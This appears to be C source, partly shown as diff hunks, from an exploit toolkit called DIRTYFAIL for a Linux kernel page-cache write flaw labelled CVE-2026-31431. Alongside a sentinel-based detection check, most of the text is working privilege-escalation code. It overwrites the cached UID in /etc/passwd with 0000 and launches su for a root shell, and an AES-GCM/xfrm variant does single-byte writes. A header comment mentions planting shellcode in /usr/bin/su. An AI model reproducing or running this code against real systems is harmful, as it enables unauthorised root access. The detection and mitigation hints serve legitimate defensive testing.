* recognizable marker ("PWND") in seqno_lo.
* 4. Re-read the sentinel and look for the marker bytes.
*
* If the marker shows up: the kernel just wrote attacker-controlled
* bytes into a page-cache page over an unmodified disk file. That is
* the entire vulnerability. Vulnerable.
*
* EXPLOIT STRATEGY
* ----------------
* /etc/passwd is world-readable and contains a 4-digit UID for normal
* users (1000-9999). Flipping that UID to "0000" in the page cache
* makes glibc's getpwnam() report uid=0 for our user. PAM (which still
* checks /etc/shadow on disk, untouched) accepts the real password,
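* and then setuid(0) lands us at root. Single 4-byte write; the on-disk
* file never changes, so evicting the cached page reverts it.
* POSIX_FADV_DONTNEED is only best-effort here (see common.c);
* drop_caches as root or a reboot is the fallback.
*/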
#include "copyfail.h"
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <pwd.h>
/* These macros come from <sys/socket.h> on Linux but vary across libcs. */
#ifndef MSG_MORE
#define MSG_MORE 0x8000
#endif
#ifdef __linux__
extern ssize_t splice(int, loff_t *, int, loff_t *, size_t, unsigned int);
#else
/* macOS analysis stub — never called at runtime. */
static ssize_t splice(int a, void *b, int c, void *d, size_t e, unsigned f)
{ (void)a; (void)b; (void)c; (void)d; (void)e; (void)f; errno = ENOSYS; return -1; }
#endif
#define PAGE 4096
#define ASSOCLEN 8 /* SPI(4) || seqno_lo(4) */
#define CRYPTLEN 16 /* one AES block */
#define TAGLEN 16 /* truncated HMAC-SHA256 */
#define SPLICE_LEN (CRYPTLEN + TAGLEN)
#define ALG_NAME "authencesn(hmac(sha256),cbc(aes))"
#define MARKER_STR "PWND"
/* ---------------------------------------------------------------- *
* af_alg_setup_socket()
*
* Creates the master AF_ALG socket, binds it to authencesn, sets a
* zero key (auth+enc), and accept(2)s an op socket. Returns the op fd
* (or -1 with errno set). On success the master fd is closed before
* return — we only need the op socket for the actual transaction.
* ---------------------------------------------------------------- */
static int af_alg_setup_socket(void)
{
int master = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (master < 0) return -1;
struct sockaddr_alg_compat sa = { .salg_family = AF_ALG };
strncpy((char *)sa.salg_type, "aead", sizeof(sa.salg_type) - 1);
strncpy((char *)sa.salg_name, ALG_NAME, sizeof(sa.salg_name) - 1);
if (bind(master, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
close(master);
return -1;
}
/* Auth key (HMAC-SHA256) is 32 bytes; cipher key (AES-128) is 16.
* We pick zero for both — auth verification will fail at the end
* (EBADMSG), but the buggy scratch-write fires *before* that, so
* the page-cache modification persists either way. */
unsigned char auth[32] = {0}, enc[16] = {0};
unsigned char keyblob[8 + 32 + 16];
size_t keylen = build_authenc_keyblob(keyblob, auth, 32, enc, 16);
if (setsockopt(master, SOL_ALG, ALG_SET_KEY, keyblob, keylen) < 0) {
close(master);
return -1;
}
int op = accept(master, NULL, NULL);
int saved = errno;
close(master);
errno = saved;
return op;
}
/* ---------------------------------------------------------------- *
* af_alg_send_aad()
*
* Sends per-op control messages (decrypt, IV, assoclen=8) plus the
* AAD itself with MSG_MORE. AAD layout:
*
* bytes 0..3 SPI (we leave zero — the kernel doesn't care)
* bytes 4..7 seqno_lo (this is the 4 bytes that get STOREd)
*
* Returns true on success.
* ---------------------------------------------------------------- */
static bool af_alg_send_aad(int op, const unsigned char four_bytes[4])
{
unsigned char aad[ASSOCLEN] = { 0 };
memcpy(aad + 4, four_bytes, 4);
unsigned int op_decrypt = ALG_OP_DECRYPT;
unsigned int assoclen = ASSOCLEN;
unsigned char iv[20]; /* u32 ivlen + 16-byte IV */
*(uint32_t *)iv = 16;
memset(iv + 4, 0, 16);
/* CMSG_SPACE values for: ALG_SET_OP(u32), ALG_SET_IV(u32+16), ALG_SET_AEAD_ASSOCLEN(u32). */
union {
char buf[CMSG_SPACE(sizeof(unsigned int))
+ CMSG_SPACE(20)
+ CMSG_SPACE(sizeof(unsigned int))];
struct cmsghdr align;
} ctrl;
memset(&ctrl, 0, sizeof(ctrl));
struct iovec iov = { .iov_base = aad, .iov_len = ASSOCLEN };
struct msghdr msg = {
.msg_iov = &iov,
.msg_iovlen = 1,
.msg_control = ctrl.buf,
.msg_controllen = sizeof(ctrl.buf),
};
struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
cm->cmsg_len = CMSG_LEN(sizeof(unsigned int));
cm->cmsg_level = SOL_ALG;
cm->cmsg_type = ALG_SET_OP;
memcpy(CMSG_DATA(cm), &op_decrypt, sizeof(op_decrypt));
cm = CMSG_NXTHDR(&msg, cm);
cm->cmsg_len = CMSG_LEN(20);
cm->cmsg_level = SOL_ALG;
cm->cmsg_type = ALG_SET_IV;
memcpy(CMSG_DATA(cm), iv, 20);
cm = CMSG_NXTHDR(&msg, cm);
cm->cmsg_len = CMSG_LEN(sizeof(unsigned int));
cm->cmsg_level = SOL_ALG;
cm->cmsg_type = ALG_SET_AEAD_ASSOCLEN;
memcpy(CMSG_DATA(cm), &assoclen, sizeof(assoclen));
return sendmsg(op, &msg, MSG_MORE) >= 0;
}
/* ---------------------------------------------------------------- *
* cf_4byte_write()
*
* The whole primitive in one function: open the target, force its
* page into the cache, set up an AF_ALG op socket, send AAD with our
* controlled 4 bytes, splice 32 bytes from the target file into the
* op socket (the kernel uses those page-cache pages as the *destination*
* of the in-place AEAD), then drive the op via recv() so that the
* scratch-write fires.
*
* `four_bytes` lands at file offset `target_off` of the cached page.
* Returns true on success (with errno cleared) — but "success" here
* just means "the syscalls completed". Whether the write actually
* landed must be confirmed by the caller via a read-back.
* ---------------------------------------------------------------- */
bool cf_4byte_write(const char *target_path,
off_t target_off,
const unsigned char four_bytes[4])
{
int target_fd = open_and_cache(target_path);
if (target_fd < 0) {
log_bad("open %s: %s", target_path, strerror(errno));
return false;
}
int op = af_alg_setup_socket();
if (op < 0) {
log_bad("AF_ALG setup: %s", strerror(errno));
close(target_fd);
return false;
}
if (!af_alg_send_aad(op, four_bytes)) {
log_bad("sendmsg AAD: %s", strerror(errno));
close(op); close(target_fd);
return false;
}
int pipefd[2];
if (pipe(pipefd) < 0) {
log_bad("pipe: %s", strerror(errno));
close(op); close(target_fd);
return false;
}
/* file -> pipe: 32 bytes from offset target_off (CRYPTLEN+TAGLEN). */
off_t off = target_off;
ssize_t n1 = splice(target_fd, &off, pipefd[1], NULL, SPLICE_LEN, 0);
if (n1 != SPLICE_LEN) {
log_bad("splice file->pipe: got %zd want %d (%s)",
n1, SPLICE_LEN, strerror(errno));
close(pipefd[0]); close(pipefd[1]); close(op); close(target_fd);
return false;
}
/* pipe -> op socket: kernel now has page-cache pages in dst SGL. */
ssize_t n2 = splice(pipefd[0], NULL, op, NULL, SPLICE_LEN, 0);
close(pipefd[0]); close(pipefd[1]);
if (n2 != SPLICE_LEN) {
log_bad("splice pipe->op: got %zd want %d (%s)",
n2, SPLICE_LEN, strerror(errno));
close(op); close(target_fd);
return false;
}
/* Drive the AEAD. recv will fail with EBADMSG (auth check fails on
* our zero key + zero ciphertext); the scratch write has already
* happened by then. */
unsigned char drain[256];
ssize_t r = recv(op, drain, sizeof(drain), 0);
int saved = errno;
(void)r;
close(op);
close(target_fd);
errno = (saved == EBADMSG || saved == EINVAL || r >= 0) ? 0 : saved;
return errno == 0;
}
/* ---------------------------------------------------------------- *
* Detection
* ---------------------------------------------------------------- */
df_result_t copyfail_detect(void)
{
log_step("Copy Fail (CVE-2026-31431) — detection");
int km = -1, kn = -1;
if (kernel_version(&km, &kn))
log_hint("kernel %d.%d.x (affected lines: 6.12, 6.17, 6.18)", km, kn);
/* Probe AF_ALG availability and instantiation of authencesn. */
int probe = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (probe < 0) {
log_ok("AF_ALG socket family unavailable (%s) — NOT vulnerable",
strerror(errno));
return DF_PRECOND_FAIL;
}
struct sockaddr_alg_compat sa = { .salg_family = AF_ALG };
strncpy((char *)sa.salg_type, "aead", sizeof(sa.salg_type) - 1);
strncpy((char *)sa.salg_name, ALG_NAME, sizeof(sa.salg_name) - 1);
if (bind(probe, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
log_ok("authencesn template not loadable (%s) — NOT vulnerable",
strerror(errno));
close(probe);
return DF_PRECOND_FAIL;
}
close(probe);
log_ok("AF_ALG + %s loadable", ALG_NAME);
/* Sentinel file probe. */
char tmpl[] = "/tmp/copyfail-sentinel.XXXXXX";
int sfd = mkstemp(tmpl);
if (sfd < 0) {
log_bad("mkstemp: %s", strerror(errno));
return DF_TEST_ERROR;
}
unsigned char sentinel[PAGE];
for (size_t i = 0; i < PAGE; i += 32)
memcpy(sentinel + i, "COPYFAIL-SENTINEL-UNCORRUPTED!!\n", 32);
if (write(sfd, sentinel, PAGE) != PAGE) {
log_bad("sentinel write: %s", strerror(errno));
close(sfd); unlink(tmpl);
return DF_TEST_ERROR;
}
close(sfd);
log_step("triggering primitive against %s with marker '%s'",
tmpl, MARKER_STR);
if (!cf_4byte_write(tmpl, 0, (const unsigned char *)MARKER_STR)) {
unlink(tmpl);
return DF_TEST_ERROR;
}
/* Re-read the sentinel via a fresh fd (page cache, not disk). */
int rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
unsigned char after[PAGE];
ssize_t got = read(rfd, after, PAGE);
close(rfd);
unlink(tmpl);
if (got != PAGE) return DF_TEST_ERROR;
/* Look for the marker. We expect it to land somewhere inside the
* 32-byte spliced region (offsets 0..31). */
unsigned char *hit = memmem(after, 32, MARKER_STR, 4);
bool orig_has_marker = memmem(sentinel, 32, MARKER_STR, 4) != NULL;
if (hit && !orig_has_marker) {
size_t off = hit - after;
log_warn("VULNERABLE — marker '%s' landed at sentinel offset %zu",
MARKER_STR, off);
log_warn("apply the upstream fix (commit a664bf3d or distro backport)");
log_warn("interim mitigation: blacklist the algif_aead module");
return DF_VULNERABLE;
}
/* Sometimes the layout puts the scratch write outside the first
* 32 bytes; check the whole page for ANY divergence. */
size_t diff_count = 0, first_diff = (size_t)-1;
for (size_t i = 0; i < PAGE; i++) {
if (after[i] != sentinel[i]) {
if (first_diff == (size_t)-1) first_diff = i;
diff_count++;
}
}
if (diff_count > 0) {
log_warn("page cache MODIFIED (%zu bytes changed, first at offset %zu)",
diff_count, first_diff);
log_warn("the marker layout differs but the underlying bug class "
"still allowed a page-cache page into the AEAD dst SGL");
return DF_VULNERABLE;
}
log_ok("page cache intact — NOT vulnerable on this kernel");
return DF_OK;
}
/* ---------------------------------------------------------------- *
* Exploit
* ---------------------------------------------------------------- */
df_result_t copyfail_exploit(bool do_shell)
{
log_step("Copy Fail (CVE-2026-31431) — exploit");
/* Resolve the calling user. We deliberately do not exploit as
* root or for arbitrary users — only the user who ran us. */
uid_t uid = getuid();
if (uid == 0) {
log_warn("already root — nothing to escalate");
return DF_OK;
}
struct passwd *pw = getpwuid(uid);
if (!pw) {
log_bad("getpwuid(%u): %s", uid, strerror(errno));
return DF_TEST_ERROR;
}
const char *user = pw->pw_name;
log_step("target user: %s (uid %u)", user, uid);
off_t uid_off = 0;
size_t uid_len = 0;
char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("could not find %s in /etc/passwd", user);
return DF_TEST_ERROR;
}
log_step("/etc/passwd: UID field at offset %lld = '%s' (%zu chars)",
(long long)uid_off, uid_str, uid_len);
if (uid_len != 4) {
log_bad("this technique needs a 4-digit UID; got '%s' (%zu chars)",
uid_str, uid_len);
log_hint("either pick a different user with a 4-digit UID, or use "
"the multi-shot variant (not implemented in DIRTYFAIL).");
return DF_TEST_ERROR;
}
log_warn("about to flip /etc/passwd page cache: '%s' -> '0000'", uid_str);
log_warn("on-disk file is unchanged. cleanup options:");
log_warn(" 1) DIRTYFAIL --cleanup (POSIX_FADV_DONTNEED + drop_caches)");
log_warn(" 2) echo 3 > /proc/sys/vm/drop_caches (from root)");
log_warn(" 3) reboot");
if (!typed_confirm("DIRTYFAIL")) {
log_bad("confirmation declined — aborting");
return DF_OK;
}
if (!ssh_lockout_check(user)) {
log_bad("SSH-lockout confirmation declined — aborting");
return DF_OK;
}
log_step("issuing 4-byte page-cache write...");
if (!cf_4byte_write("/etc/passwd", uid_off,
(const unsigned char *)"0000")) {
log_bad("primitive failed");
return DF_EXPLOIT_FAIL;
}
/* Verify via a fresh read against the page cache. */
int v = open("/etc/passwd", O_RDONLY);
if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; }
if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; }
char land[5] = {0};
if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; }
close(v);
if (memcmp(land, "0000", 4) != 0) {
log_bad("write did not land — page cache reads '%.4s'", land);
return DF_EXPLOIT_FAIL;
}
log_ok("page cache now reports %s with uid 0", user);
/* Sanity check via libc — getpwnam() walks NSS, which on most
* systems hits files first, so this should agree with our patch. */
struct passwd *p = getpwnam(user);
if (p) log_step("getpwnam('%s').pw_uid = %u", user, p->pw_uid);
if (!do_shell) {
if (dirtyfail_no_revert) {
log_warn("--no-revert: leaving page cache poisoned (run "
"`dirtyfail --cleanup` or reboot to revert)");
return DF_EXPLOIT_OK;
}
log_hint("--no-shell selected; reverting page cache");
if (try_revert_passwd_page_cache())
log_ok("page cache reverted");
else
log_warn("page cache may still be modified — `sudo dirtyfail --cleanup` or reboot");
return DF_EXPLOIT_OK;
}
log_ok("invoking 'su %s' — enter your own password to drop into a root shell",
user);
log_hint("after exit, run DIRTYFAIL --cleanup or reboot");
execlp("su", "su", user, (char *)NULL);
log_bad("execlp su: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
+33
@@ -0,0 +1,33 @@
/*
* DIRTYFAIL — copyfail.h
*
* Public surface for the Copy Fail (CVE-2026-31431) module.
*/
#ifndef DIRTYFAIL_COPYFAIL_H
#define DIRTYFAIL_COPYFAIL_H
#include "common.h"
/* Run all preflight checks and the sentinel-file primitive probe.
* Never modifies system files. */
df_result_t copyfail_detect(void);
/* Real PoC: flip the running user's 4-digit UID in /etc/passwd page
* cache to "0000" and (optionally) execve `su <user>` to drop a root
* shell. `do_shell` controls whether to invoke su; if false, the patch
* is reverted via POSIX_FADV_DONTNEED before returning so the system
* does not stay in a broken state. */
df_result_t copyfail_exploit(bool do_shell);
/* Low-level building block: write 4 bytes into the page cache of
* `target_path` at `target_off`. Caller must have read access to
* the file. Same primitive that copyfail_exploit uses internally;
* exposed for exploit_su.c to chain ~12 calls into a 48-byte
* shellcode plant against /usr/bin/su. Returns true if the AF_ALG
* sequence completed; caller MUST verify via re-read. */
bool cf_4byte_write(const char *target_path,
off_t target_off,
const unsigned char four_bytes[4]);
#endif
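The header above says a `true` return only means the call sequence completed and that the caller must verify via re-read. A small sketch of such a re-read check follows, assuming a hypothetical helper name `bytes_match_at` and an arbitrary 64-byte comparison limit; neither comes from the DIRTYFAIL sources.

```c
#include <fcntl.h>
#include <stdbool.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper, for illustration only: returns true only if the
 * `len` bytes stored at offset `off` in `path` equal `expected`.
 * A short read, an open failure, or len outside 1..64 yields false. */
bool bytes_match_at(const char *path, off_t off,
                    const unsigned char *expected, size_t len)
{
    unsigned char buf[64];
    if (len == 0 || len > sizeof(buf))
        return false;

    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return false;

    /* pread does not move the file offset, so no lseek is needed. */
    ssize_t n = pread(fd, buf, len, off);
    close(fd);

    return n == (ssize_t)len && memcmp(buf, expected, len) == 0;
}
```

Treating a short read as a mismatch keeps the check conservative: anything other than a full, exact match is reported as a failure.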
+634
@@ -0,0 +1,634 @@
/*
* DIRTYFAIL — copyfail_gcm.c
*
* See copyfail_gcm.h for the design notes. This file implements:
*
* 1. AES-GCM keystream byte 0 computation via AF_ALG `gcm(aes)`.
* 2. IV brute force until keystream[0] equals the desired XOR mask.
* 3. SA installation via `ip xfrm state add ...` (system(3) — saves
* ~150 lines of netlink boilerplate vs. our authencesn path; the
* gcm primitive is the right place to take that dep, and every
* modern distro ships iproute2).
* 4. Splice trigger: ESP wire header (16B) + 1 target byte + 16-byte
* ICV pad. The kernel's in-place GCM decrypt XORs keystream[0]
* onto the spliced page-cache byte, which is what we control.
*/
#include "copyfail_gcm.h"
#include "apparmor_bypass.h"
#include <fcntl.h>
#include <pwd.h>
#include <stdarg.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/uio.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#ifdef __linux__
#include <sched.h>
#include <sys/syscall.h>
#include <linux/if.h>
#include <sys/ioctl.h>
extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out,
size_t len, unsigned int flags);
#endif
#ifndef UDP_ENCAP
#define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP 2
#endif
#define ENCAP_PORT 4500
#define ESP_SPI 0xCAFEBABE
#define IV_LEN 8
#define ICV_LEN 16
#define AES_KEY_LEN 16
#define SALT_LEN 4
#define KEY_TOTAL (AES_KEY_LEN + SALT_LEN) /* rfc4106 expects 20 */
/* Fixed AEAD key (16-byte AES key + 4-byte salt). Both are attacker-
 * chosen; auth verification will fail at the end of decrypt anyway,
 * but the STORE has already happened by then. */
__attribute__((unused))
static const unsigned char AEAD_KEY[KEY_TOTAL] = {
0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f,
0x10, 0x11, 0x12, 0x13,
};
/* ---------------------------------------------------------------- *
* Detection
* ---------------------------------------------------------------- */
df_result_t copyfail_gcm_detect(void)
{
log_step("Copy Fail GCM variant — detection");
int km, kn;
if (kernel_version(&km, &kn))
log_hint("kernel %d.%d.x", km, kn);
/* Probe AF_ALG availability of rfc4106(gcm(aes)). */
int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (s < 0) {
log_ok("AF_ALG unavailable — GCM variant unreachable");
return DF_PRECOND_FAIL;
}
struct sockaddr_alg_compat sa = { .salg_family = AF_ALG };
strncpy((char *)sa.salg_type, "aead", sizeof(sa.salg_type) - 1);
strncpy((char *)sa.salg_name, "rfc4106(gcm(aes))", sizeof(sa.salg_name) - 1);
if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
log_ok("rfc4106(gcm(aes)) not loadable — GCM variant unreachable");
close(s);
return DF_PRECOND_FAIL;
}
close(s);
log_ok("AF_ALG + rfc4106(gcm(aes)) loadable");
bool userns = unprivileged_userns_allowed();
log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED");
if (!userns) {
log_warn("preconditions partial — userns blocked. Try with --aa-bypass.");
return DF_PRECOND_FAIL;
}
if (apparmor_userns_caps_blocked()) {
log_ok("LSM-mitigated — unprivileged userns lacks caps; xfrm SA install "
"via `ip xfrm` requires CAP_NET_ADMIN that the AA policy denies.");
return DF_PRECOND_FAIL;
}
if (dirtyfail_active_probes) {
log_step("--active set: firing rfc4106(gcm) trigger against /tmp sentinel");
df_result_t pr = copyfail_gcm_active_probe();
if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr;
log_warn("active probe inconclusive — falling back to precondition verdict");
}
log_warn("VULNERABLE — GCM-variant of xfrm-ESP page-cache write reachable");
log_warn("apply mainline patch f4c50a4034e6 or distro backport");
log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe");
return DF_VULNERABLE;
}
/* ---------------------------------------------------------------- *
* AES-GCM keystream byte 0 — computed via AF_ALG `ecb(aes)` instead
* of `aead gcm(aes)`.
*
* BACKGROUND
* ----------
* Originally we used AF_ALG `aead` `gcm(aes)`: bind, set key + tag size,
* sendmsg with assoclen=0 + 1-byte zero plaintext, read back 17 bytes
* of (ciphertext || tag). The first byte of the output IS the keystream
* byte we want (since pt=0 means ct = ks XOR 0 = ks).
*
* That worked in unit tests on some kernels but on Ubuntu 24.04 / 6.8
* the read() blocks indefinitely — the 1-byte AEAD plaintext doesn't
* produce output until additional data is sent or the socket is shut
* down. Tracking down the exact "what does this kernel want" was a rat
* hole.
*
* Instead, we compute keystream byte 0 directly. Per NIST SP 800-38D,
* GCM with a 12-byte nonce derives the initial counter as
* J0 = nonce || 0x00000001
* and the counter for the first plaintext block is J0 + 1 =
* nonce || 0x00000002
* The keystream block is E_K(that counter), so:
* keystream[0] = AES-128-ECB(K, nonce || 0x00000002)[0]
*
* AF_ALG `ecb(aes)` is bulletproof — single-block in, single-block out,
* no MSG_MORE / shutdown semantics to get wrong. ~6 µs per call on a
* 4-core VM, vs ~50 µs for the AEAD path that didn't actually work.
*
* (cf2's copyfail2.c uses OpenSSL EVP_aes_128_gcm to do the same
* computation indirectly. We avoid the libssl dependency by going
* through AF_ALG ECB directly.)
* ---------------------------------------------------------------- */
#ifdef __linux__
static int gcm_open(void)
{
int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (s < 0) return -1;
struct sockaddr_alg_compat sa = { .salg_family = AF_ALG };
strncpy((char *)sa.salg_type, "skcipher", sizeof(sa.salg_type) - 1);
strncpy((char *)sa.salg_name, "ecb(aes)", sizeof(sa.salg_name) - 1);
if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
close(s); return -1;
}
if (setsockopt(s, SOL_ALG, ALG_SET_KEY,
AEAD_KEY, AES_KEY_LEN) < 0) { /* AES-128 key */
close(s); return -1;
}
return s;
}
/* Compute byte 0 of the GCM keystream for the given 12-byte nonce by
* ECB-encrypting the counter block (nonce || 0x00000002). */
static bool gcm_keystream_byte0(int ecb_s, const uint8_t nonce[12],
uint8_t *out_byte)
{
int op = accept(ecb_s, NULL, NULL);
if (op < 0) return false;
/* Counter block: J0 + 1 = nonce(12) || 0x00000002. The +1 is
* because GCM reserves J0 itself for the auth-tag XOR, so the
* first plaintext block uses J0+1. */
uint8_t block[16];
memcpy(block, nonce, 12);
block[12] = 0; block[13] = 0; block[14] = 0; block[15] = 2;
char cbuf[CMSG_SPACE(sizeof(unsigned int))] = {0};
unsigned int op_enc = ALG_OP_ENCRYPT;
struct msghdr msg = { .msg_control = cbuf, .msg_controllen = sizeof(cbuf) };
struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
c->cmsg_level = SOL_ALG;
c->cmsg_type = ALG_SET_OP;
c->cmsg_len = CMSG_LEN(sizeof(unsigned int));
memcpy(CMSG_DATA(c), &op_enc, sizeof(op_enc));
struct iovec iov = { .iov_base = block, .iov_len = 16 };
msg.msg_iov = &iov; msg.msg_iovlen = 1;
if (sendmsg(op, &msg, 0) != 16) { close(op); return false; }
uint8_t out[16];
ssize_t n = read(op, out, 16);
close(op);
if (n != 16) return false;
*out_byte = out[0];
return true;
}
/* Brute force IV until keystream byte 0 equals want_ks. Returns the
 * number of iterations tried, or -1 on failure; on success writes the
 * winning 8-byte IV into iv_out. */
static int64_t gcm_brute_iv(uint8_t want_ks, uint8_t iv_out[IV_LEN])
{
int s = gcm_open();
if (s < 0) {
log_bad("gcm_open: %s", strerror(errno));
return -1;
}
uint8_t nonce[12];
memcpy(nonce, AEAD_KEY + AES_KEY_LEN, SALT_LEN); /* salt prefix */
for (uint64_t v = 1; v < (1ULL << 32); v++) {
memcpy(nonce + SALT_LEN, &v, IV_LEN); /* low 8 bytes */
uint8_t ks;
if (!gcm_keystream_byte0(s, nonce, &ks)) {
close(s);
return -1;
}
if (ks == want_ks) {
memcpy(iv_out, &v, IV_LEN);
close(s);
return (int64_t)v;
}
if ((v & 0xFFF) == 0 && v > 16384) {
/* progress hint every 4096 trials once past 16k (very unlucky case). */
log_hint("gcm IV brute: %llu trials so far...",
(unsigned long long)v);
}
}
close(s);
return -1;
}
/* ---------------------------------------------------------------- *
* SA install via `ip xfrm state add ...`
* ---------------------------------------------------------------- */
static bool ip_run(const char *fmt, ...)
{
char cmd[2048];
va_list ap;
va_start(ap, fmt);
vsnprintf(cmd, sizeof(cmd), fmt, ap);
va_end(ap);
int rc = system(cmd);
return rc == 0;
}
static bool gcm_install_sa(const uint8_t iv[IV_LEN])
{
char keyhex[KEY_TOTAL * 2 + 3];
char *p = keyhex;
p += sprintf(p, "0x");
for (int i = 0; i < KEY_TOTAL; i++)
p += sprintf(p, "%02x", AEAD_KEY[i]);
/* `ip xfrm state add` registers a transport-mode ESP SA over
* loopback with rfc4106(gcm(aes)) AEAD. Encap is ESPINUDP/4500
* matching what we'll send via splice. */
(void)iv; /* IV travels in the wire packet, not the SA. */
return ip_run(
"ip link set lo up >/dev/null 2>&1 ; "
"ip xfrm state flush >/dev/null 2>&1 ; "
"ip xfrm state add src 127.0.0.1 dst 127.0.0.1 proto esp "
"spi 0x%08x encap espinudp %d %d 0.0.0.0 "
"aead 'rfc4106(gcm(aes))' %s 128 replay-window 32 >/dev/null 2>&1",
ESP_SPI, ENCAP_PORT, ENCAP_PORT, keyhex);
}
/* ---------------------------------------------------------------- *
* Splice trigger
* ---------------------------------------------------------------- */
static bool gcm_trigger(const char *target_path, off_t target_off,
const uint8_t iv[IV_LEN])
{
int rs = socket(AF_INET, SOCK_DGRAM, 0);
if (rs < 0) return false;
int encap = UDP_ENCAP_ESPINUDP;
setsockopt(rs, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap));
struct sockaddr_in la = {
.sin_family = AF_INET,
.sin_port = htons(ENCAP_PORT),
.sin_addr.s_addr = htonl(INADDR_LOOPBACK),
};
int reuse = 1;
setsockopt(rs, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse));
if (bind(rs, (struct sockaddr *)&la, sizeof(la)) < 0) {
close(rs); return false;
}
/* Build attacker page in /tmp: ESP header(16) + ICV pad at offset
* 4096. We splice these from a real file so the kernel sees them
* as page-cache pages on the splice path. */
char atkpath[64];
snprintf(atkpath, sizeof(atkpath), "/tmp/dirtyfail-gcm.%d", (int)getpid());
unlink(atkpath);
int afd = open(atkpath, O_RDWR | O_CREAT | O_EXCL, 0600);
if (afd < 0) { close(rs); return false; }
unsigned char esp_hdr[16];
*(uint32_t *)(esp_hdr + 0) = htonl(ESP_SPI);
*(uint32_t *)(esp_hdr + 4) = htonl(1); /* SeqNum */
memcpy(esp_hdr + 8, iv, IV_LEN);
if (pwrite(afd, esp_hdr, 16, 0) != 16) goto fail;
unsigned char icv[ICV_LEN] = {0};
if (pwrite(afd, icv, ICV_LEN, 4096) != ICV_LEN) goto fail;
fsync(afd);
#ifdef POSIX_FADV_DONTNEED
posix_fadvise(afd, 0, 0, POSIX_FADV_DONTNEED);
#endif
int afd2 = open(atkpath, O_RDONLY);
if (afd2 < 0) goto fail;
unlink(atkpath);
int tfd = open(target_path, O_RDONLY);
if (tfd < 0) { close(afd2); goto fail; }
int p[2];
if (pipe(p) < 0) { close(afd2); close(tfd); goto fail; }
fcntl(p[0], F_SETPIPE_SZ, 1 << 20);
fcntl(p[1], F_SETPIPE_SZ, 1 << 20);
/* esp_hdr (16) || target_byte (1) || icv_pad (16) — 33 bytes total. */
loff_t off;
off = 0; if (splice(afd2, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) goto trig_fail;
off = target_off; if (splice(tfd, &off, p[1], NULL, 1, SPLICE_F_MOVE) != 1) goto trig_fail;
off = 4096; if (splice(afd2, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) goto trig_fail;
int ss = socket(AF_INET, SOCK_DGRAM, 0);
if (ss < 0) goto trig_fail;
if (connect(ss, (struct sockaddr *)&la, sizeof(la)) < 0) { close(ss); goto trig_fail; }
ssize_t sent = splice(p[0], NULL, ss, NULL, 16 + 1 + 16, SPLICE_F_MOVE);
(void)sent;
close(ss);
close(p[0]); close(p[1]);
/* Wait for esp_input to finish the in-place STORE before we
* tear down sockets. 150ms matches V4bel's reference; 50ms was
* working on x86 lab kernels but tight on ARM64 / loaded VMs. */
usleep(150 * 1000);
unsigned char drain[256];
(void)recv(rs, drain, sizeof(drain), MSG_DONTWAIT);
close(afd2); close(tfd); close(afd); close(rs);
return true;
trig_fail:
close(p[0]); close(p[1]); close(afd2); close(tfd);
fail:
close(afd); close(rs);
unlink(atkpath);
return false;
}
/* ---------------------------------------------------------------- *
* Public 1-byte primitive
* ---------------------------------------------------------------- */
bool cfg_1byte_write(const char *target_path,
off_t target_off, unsigned char want_byte)
{
/* Read current byte. */
int tfd = open(target_path, O_RDONLY);
if (tfd < 0) {
log_bad("open %s: %s", target_path, strerror(errno));
return false;
}
unsigned char cur = 0;
if (pread(tfd, &cur, 1, target_off) != 1) {
log_bad("pread current: %s", strerror(errno));
close(tfd); return false;
}
close(tfd);
if (cur == want_byte) {
return true; /* already what we want */
}
uint8_t want_ks = cur ^ want_byte;
log_step("cfg_1byte_write off=%lld 0x%02x -> 0x%02x (need_ks=0x%02x)",
(long long)target_off, cur, want_byte, want_ks);
/* Brute force IV via AF_ALG. */
uint8_t iv[IV_LEN];
int64_t iters = gcm_brute_iv(want_ks, iv);
if (iters < 0) {
log_bad("gcm IV brute force failed (want_ks=0x%02x)", want_ks);
return false;
}
log_step(" IV found in %lld iters", (long long)iters);
/* Install SA. */
if (!gcm_install_sa(iv)) {
log_bad("ip xfrm state add failed");
return false;
}
log_step(" SA installed");
/* Trigger. */
if (!gcm_trigger(target_path, target_off, iv)) {
log_bad("gcm trigger failed");
return false;
}
log_step(" trigger fired");
/* Verify. */
int v = open(target_path, O_RDONLY);
if (v < 0) return false;
unsigned char post = 0;
if (pread(v, &post, 1, target_off) != 1) { close(v); return false; }
close(v);
if (post != want_byte) {
log_bad("byte at off=%lld is 0x%02x, wanted 0x%02x",
(long long)target_off, post, want_byte);
return false;
}
return true;
}
